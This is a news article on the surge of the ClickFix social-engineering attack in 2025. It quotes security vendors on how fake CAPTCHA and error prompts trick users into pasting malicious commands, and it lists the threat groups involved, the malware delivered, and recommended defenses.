A fast-growing cyber threat known as ClickFix has surged by 517% in the first half of 2025, making it the second most common attack vector after phishing and accounting for nearly 8% of all blocked attacks. The tactic relies entirely on social engineering, tricking users into running malicious commands on their own devices through fake error messages, CAPTCHA, or verification prompts.

According to Kaspersky, “The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques.” Victims are typically guided through simple steps like pressing Win+R, pasting a command into the Run dialog, and hitting Enter, unknowingly launching malware.

Security experts warn that the attack’s strength lies in bypassing traditional security defenses by leveraging trusted tools like PowerShell and Windows’ own utilities. SentinelOne explained, “Tricking victims into infecting themselves in this manner has proven highly effective, with threat actors increasingly folding this technique into their playbook.”

ClickFix has been adopted by major threat groups, including Russia’s APT28, North Korea’s Kimsuky, and Iran’s MuddyWater. It has been used to distribute malware families such as Lumma Stealer, DarkGate, NetSupport RAT, and AsyncRAT. Campaigns have targeted healthcare facilities, e-commerce platforms, and even government organizations. Infections have spread globally but hit hardest in Japan, Peru, Poland, Spain, and Slovakia.

One recent operation documented by Microsoft Threat Intelligence combined blockchain-hosted payloads with ClickFix, making detection and blocking even more difficult. Meanwhile, researchers have identified commercial ClickFix builders being sold on underground forums, enabling low-skilled attackers to launch advanced campaigns.

The attack depends on human behavior more than software flaws, exploiting urgency, authority, and trust in familiar brands. Fake CAPTCHAs or error messages convince users they are solving a problem when, in fact, they are installing malware. As Kaspersky warned, “If someone seeks any manual manipulations with the system — it’s an extremely alarming sign.”

Security companies recommend training employees to recognize suspicious prompts, restricting PowerShell execution where possible, and deploying modern endpoint detection tools. Without heightened awareness, ClickFix is likely to remain one of the most dangerous malware delivery methods of 2025.